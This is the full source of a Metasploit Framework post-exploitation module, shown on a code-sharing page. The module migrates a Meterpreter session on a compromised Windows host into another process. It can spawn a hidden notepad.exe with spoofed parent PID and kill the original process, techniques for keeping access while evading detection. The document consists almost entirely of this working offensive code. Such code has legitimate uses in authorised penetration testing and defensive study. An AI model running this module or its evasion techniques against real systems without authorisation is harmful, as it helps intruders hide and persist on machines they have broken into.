Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/migrate.rb
19669 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Common

8
  include Msf::Post::Windows::Process

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Windows Manage Process Migration',

15
        'Description' => %q{

16
          This module will migrate a Meterpreter session from one process

17
          to another. A given process PID to migrate to or the module can spawn one and

18
          migrate to that newly spawned process.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'Carlos Perez <carlos_perez[at]darkoperator.com>',

23
          'phra <https://iwantmore.pizza>'

24
        ],

25
        'Platform' => [ 'win' ],

26
        'SessionTypes' => [ 'meterpreter' ],

27
        'Compat' => {

28
          'Meterpreter' => {

29
            'Commands' => %w[

30
              core_migrate

31
              stdapi_sys_config_getenv

32
              stdapi_sys_process_attach

33
              stdapi_sys_process_execute

34
              stdapi_sys_process_kill

35
            ]

36
          }

37
        },

38
        'Notes' => {

39
          'Stability' => [CRASH_SERVICE_DOWN],

40
          'SideEffects' => [CONFIG_CHANGES],

41
          'Reliability' => []

42
        }

43
      )

44
    )

45


46
    register_options(

47
      [

48
        OptBool.new('SPAWN', [false, 'Spawn process to migrate to. If set, notepad.exe is used.', true]),

49
        OptInt.new('PID', [false, 'PID of process to migrate to.', 0]),

50
        OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),

51
        OptString.new('PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),

52
        OptString.new('NAME', [false, 'Name of process to migrate to.']),

53
        OptBool.new('KILL', [false, 'Kill original process for the session.', false])

54
      ]

55
    )

56
  end

57


58
  def run

59
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']

60
    print_status("Running module against #{hostname} (#{session.session_host})")

61


62
    server = session.sys.process.open

63
    original_pid = server.pid

64
    print_status("Current server process: #{server.name} (#{server.pid})")

65


66
    target_pid = nil

67


68
    if datastore['SPAWN'] && (datastore['SPAWN'] != '')

69
      target_pid = create_temp_proc

70
    elsif datastore['PID'] && (datastore['PID'] != 0)

71
      target_pid = datastore['PID']

72
    elsif datastore['NAME'] && (datastore['NAME'] != '')

73
      target_pid = session.sys.process[datastore['NAME']]

74
    end

75


76
    if !target_pid || !has_pid?(target_pid)

77
      print_error("Process #{target_pid} not found")

78
      return

79
    end

80


81
    begin

82
      print_status("Migrating into #{target_pid}")

83
      session.core.migrate(target_pid)

84
      print_good("Successfully migrated into process #{target_pid}")

85
    rescue StandardError => e

86
      print_error('Could not migrate into process')

87
      print_error("Exception: #{e.class} : #{e}")

88
    end

89


90
    if datastore['KILL']

91
      print_status("Killing original process with PID #{original_pid}")

92
      if has_pid?(original_pid)

93
        session.sys.process.kill(original_pid)

94
        print_good("Successfully killed process with PID #{original_pid}")

95
      else

96
        print_warning("PID #{original_pid} exited on its own")

97
      end

98
    end

99
  end

100


101
  # Creates a temp notepad.exe to migrate to depending the architecture.

102
  def create_temp_proc

103
    target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']

104
    cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)

105


106
    print_status('Spawning notepad.exe process to migrate into')

107


108
    if (target_ppid != 0) && !has_pid?(target_ppid)

109
      print_error("Process #{target_ppid} not found")

110
      return

111
    end

112


113
    if has_pid?(target_ppid)

114
      print_status("Spoofing PPID #{target_ppid}")

115
    end

116


117
    # run hidden

118
    proc = session.sys.process.execute(cmd, nil, {

119
      'Hidden' => true,

120
      'ParentPid' => target_ppid

121
    })

122


123
    return proc.pid

124
  end

125
end

126


127